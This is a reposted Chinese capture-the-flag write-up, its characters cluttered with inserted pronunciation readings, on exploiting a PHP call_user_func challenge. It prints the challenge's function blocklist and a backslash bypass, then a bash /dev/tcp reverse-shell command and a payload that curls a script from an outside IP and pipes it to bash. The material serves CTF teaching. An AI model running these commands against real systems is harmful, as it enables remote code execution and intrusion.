當(dāng)前位置：首頁(yè) > 编程语言 > php >内容正文

php

[网鼎杯 2020 朱雀组]phpweb-反弹shell

發(fā)布時(shí)間：2024/1/1 php 38 豆豆

生活随笔收集整理的這篇文章主要介紹了 [网鼎杯 2020 朱雀组]phpweb-反弹shell 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

[網(wǎng)鼎杯 2020 朱雀組]phpweb

通過(guò)反彈shell獲取flag

打開(kāi)鏈接，顯示一個(gè)不斷刷新的頁(yè)面，通過(guò)burp抓包查看

通過(guò)對(duì)頁(yè)面源代碼的分析，發(fā)現(xiàn)在本頁(yè)面中，通過(guò)post傳入index.php中兩個(gè)參數(shù)，通過(guò)對(duì)參數(shù)的修改，發(fā)現(xiàn)用到了call_user_func()函數(shù)

故猜測(cè)本題通過(guò)func傳入php函數(shù)名，通過(guò)p參數(shù)傳入函數(shù)值，嘗試讀取index.php文件內(nèi)容

利用

func=file_get_contents&p=index.php func=readfile&p=index.php

讀取到index.php文件內(nèi)容，對(duì)代碼進(jìn)行分析

$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter","array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);//將傳入的兩個(gè)參數(shù)，賦給call_user_func函數(shù)，作為參數(shù)執(zhí)行$a= gettype($result);//判斷返回類(lèi)型，若為字符串就輸出對(duì)應(yīng)的結(jié)果if ($a == "string") {return $result;} else {return "";}}class Test {//構(gòu)造反序列化時(shí)，可以利用這個(gè)類(lèi)var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);//func值不為空，即調(diào)用gettime函數(shù)}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"]; //接收get或post傳入的值if ($func != null) { //判斷非空$func = strtolower($func); //轉(zhuǎn)換成小寫(xiě)if (!in_array($func,$disable_fun)) { //過(guò)濾掉被禁用的函數(shù)之后執(zhí)行函數(shù)gettimeecho gettime($func, $p);}else {die("Hacker...");}}

可以通過(guò)反序列化搭配命令執(zhí)行求解，也可以只通過(guò)命令執(zhí)行求解，但是重點(diǎn)介紹本題通過(guò)反彈shell的做法

在攻擊機(jī)中，新建一個(gè)能反彈shell的命令文件（1.txt），里面寫(xiě)入命令：bash -i >& /dev/tcp/ip/port 0>&1,ip是服務(wù)器ip，port為2002

本地curl測(cè)試：

同理可以構(gòu)造命令進(jìn)行反彈shell：

func=\system&p=curl http://101.43.119.212/YKingH/test/1.txt|bash

連接成功

總結(jié)

以上是生活随笔為你收集整理的[网鼎杯 2020 朱雀组]phpweb-反弹shell的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇：佳博打印机 ANDROID
下一篇：动态规划算法php,php算法学习之动态